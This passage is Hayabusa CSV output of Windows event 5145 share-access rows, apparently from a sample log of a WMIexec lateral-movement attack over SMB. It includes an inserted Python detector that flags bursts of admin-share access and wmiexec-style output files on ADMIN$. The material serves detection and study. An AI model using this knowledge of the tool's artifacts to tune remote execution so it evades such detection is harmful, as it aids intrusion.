0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 
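The rows above are one SMB session: user admmig, source 10.23.23.9, logon ID 0x18acdd (a second logon ID, 0x18b247, appears for the same user on the Users rows), walking the C$ administrative share in roughly 250 ms. Each row carries rule level `info`, so the signal is not in any single line but in the aggregate: one remote logon touching an admin share dozens of times in under a second. Note that Security event 5145 is only written when the "Audit Detailed File Share" subcategory is enabled, and the rule that produced these rows lives in the `non-default` rule directory. The following Python is an added example, not Hayabusa's own code: it parses rows in this CSV layout, splits the `Key: value | Key: value` Details column, groups 5145 rows on administrative shares by (Computer, User, IP Addr, LID), and flags a session that bursts past a threshold inside a sliding window. It also flags a `__<unix time>` file read from ADMIN$, which is an assumption about Impacket wmiexec's default output-file naming and is not something these rows show. The sample rows are constructed for the example (the admmig rows are modelled on the page; the ADMIN$, jdoe and backupsvc rows and the shortened RulePath/FilePath columns are made up).

```python
import csv
import io
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample rows in the Hayabusa CSV column layout used on this page
# (Timestamp,Computer,EventID,Level,MitreAttack,RuleTitle,Details,RulePath,FilePath).
# admmig/C$ rows are modelled on the page; the ADMIN$, jdoe and backupsvc rows and
# the shortened RulePath/FilePath values are made up for the example.
SAMPLE_CSV = r"""Timestamp,Computer,EventID,Level,MitreAttack,RuleTitle,Details,RulePath,FilePath
2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Vb0a86591# | IP Addr: 10.23.23.9 | LID: 0x18acdd,5145_NetworkShareFileAccess.yml,sample.evtx
2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Vf4833439# | IP Addr: 10.23.23.9 | LID: 0x18acdd,5145_NetworkShareFileAccess.yml,sample.evtx
2021-04-22 20:32:30.063 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2bac6884# | IP Addr: 10.23.23.9 | LID: 0x18acdd,5145_NetworkShareFileAccess.yml,sample.evtx
2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users | IP Addr: 10.23.23.9 | LID: 0x18acdd,5145_NetworkShareFileAccess.yml,sample.evtx
2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,5145_NetworkShareFileAccess.yml,sample.evtx
2021-04-22 20:32:31.500 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619091150.21 | IP Addr: 10.23.23.9 | LID: 0x18acdd,5145_NetworkShareFileAccess.yml,sample.evtx
2021-04-22 20:40:00.000 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: jdoe | Share Name: \\*\Projects | Share Path: \??\D:\Projects | Path: q2\report.docx | IP Addr: 10.23.23.40 | LID: 0x19f002,5145_NetworkShareFileAccess.yml,sample.evtx
2021-04-22 20:41:00.000 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: backupsvc | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\config | IP Addr: 10.23.23.12 | LID: 0x1a0010,5145_NetworkShareFileAccess.yml,sample.evtx
"""

ADMIN_SHARES = {"C$", "ADMIN$", "IPC$"}

# Assumption about the tool, not something the rows on this page show: Impacket's
# wmiexec.py by default redirects command output to \\127.0.0.1\ADMIN$\__<unix time>
# and reads it back over SMB, so a 5145 on ADMIN$ with such a name is a strong signal.
WMIEXEC_OUTPUT = re.compile(r"^__\d+(\.\d+)?$")


def parse_details(details):
    """Split Hayabusa's 'Key: value | Key: value' Details column into a dict."""
    out = {}
    for part in details.split(" | "):
        key, sep, value = part.partition(": ")
        if sep:
            out[key.strip()] = value.strip()
    return out


def share_basename(share_name):
    # 5145 records the share as \\*\C$; keep only the share name, upper-cased.
    return share_name.rsplit("\\", 1)[-1].upper()


def parse_timestamp(ts):
    """Hayabusa prints e.g. '2021-04-22 20:32:30.032 +09:00'."""
    return datetime.strptime(ts, "%Y-%m-%d %H:%M:%S.%f %z")


def load_rows(csv_text):
    return list(csv.DictReader(io.StringIO(csv_text)))


def sessionize(rows):
    """Group 5145 rows that touch an administrative share by the SMB session
    (Computer, User, source IP, logon ID). The LID is what ties rows together;
    a different LID from the same user and IP is a separate session."""
    sessions = defaultdict(list)
    for r in rows:
        if r["EventID"] != "5145":
            continue
        d = parse_details(r["Details"])
        share = share_basename(d.get("Share Name", ""))
        if share not in ADMIN_SHARES:
            continue
        key = (r["Computer"], d.get("User"), d.get("IP Addr"), d.get("LID"))
        sessions[key].append((parse_timestamp(r["Timestamp"]), share, d.get("Path", "")))
    for events in sessions.values():
        events.sort()
    return sessions


def find_suspicious_sessions(rows, threshold=5, window=timedelta(seconds=2)):
    """Flag a session when it hits admin shares >= threshold times inside one
    sliding window, or when it reads a wmiexec-style output file from ADMIN$."""
    hits = []
    for (computer, user, ip, lid), events in sessionize(rows).items():
        reasons = []
        peak, j = 0, 0
        for i, (t, _, _) in enumerate(events):
            while t - events[j][0] > window:
                j += 1
            peak = max(peak, i - j + 1)
        if peak >= threshold:
            reasons.append(f"{peak} admin-share accesses within {window.total_seconds():g}s")
        out_files = [p for _, s, p in events if s == "ADMIN$" and WMIEXEC_OUTPUT.match(p)]
        if out_files:
            reasons.append("wmiexec-style output file on ADMIN$: " + ", ".join(out_files))
        if reasons:
            hits.append({"computer": computer, "user": user, "ip": ip, "lid": lid,
                         "events": len(events), "reasons": reasons})
    return hits


if __name__ == "__main__":
    for h in find_suspicious_sessions(load_rows(SAMPLE_CSV)):
        print(f"{h['computer']} user={h['user']} ip={h['ip']} lid={h['lid']} events={h['events']}")
        for reason in h["reasons"]:
            print("  -", reason)
```

On the constructed sample only the admmig session is reported: six admin-share accesses inside a two-second window plus the ADMIN$ output-file read. The backupsvc C$ access is a single event and stays below the threshold, and the jdoe row never enters the session table because `Projects` is not an administrative share. Tune `threshold` and `window` against a baseline of your own admin-share traffic before relying on the burst rule; the page's own session would score 78 within 250 ms.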
2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wb9b5bb58# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wb9b5bb58#\789a3b275b1f5369ae5ab066e2461420 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wbc80354b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wbc80354b#\fac59f632a5e8454549a214641d7bf25 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wc1cc6649# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wc1cc6649#\996a8c9071e330fe0cfac06c4d9f2378 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wca5f1176# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wca5f1176#\f8b6726fa5f43478af33a92559c0cef2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wcffedcb4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wcffedcb4#\f6be55d69bb92d49c71a4f9861c21451 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wd75d181a# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wd75d181a#\1a3848fefabdd8a28f5cae97106da369 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wd518ee0d# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wd518ee0d#\da3f8769af3163f94176c12ad223cb41 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.We9f24001# | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.We9f24001#\6a6b3af569c21f51ab2982968ae2775d | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.We0722664# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.We0722664#\559ec1b9bc74181e3591df47bdb6b7ce | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | 
Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wed3937f9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wed3937f9#\4af7f054b14a220217737e71e6adff82 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wf493a5fb# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wf493a5fb#\1a4e8e027cdf1271603e7eba2cd8fab0 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 
2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\MIGUIControls | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\MIGUIControls\184c548bb9ea9e668823e3bedee4d86a | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\MMCEx | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\MMCEx\85a6f67f65de23064f7deded08a464c5 | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\MMCFxCommon | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\MMCFxCommon\52b6052b9447848191f40e69c88f0f8b | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\MSBuild | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_32\MSBuild\2965d6f0cc081ef81005efec548f72a9 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\mscorlib | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\c90ef9a73ea0044641d31b19023aad61 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\napcrypt | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share 
File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\napcrypt\2c945f157cd851b9dc43e99e9a89b34d | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\naphlpr | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\naphlpr\0ed1ed0e250773e63d7fe047dde76c81 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\napinit | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 
20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\napinit\1264f8bd57934a4941865b3c0512803e | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\napsnap | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\napsnap\5ab2511c5224a660e85286b3f2c2b752 | 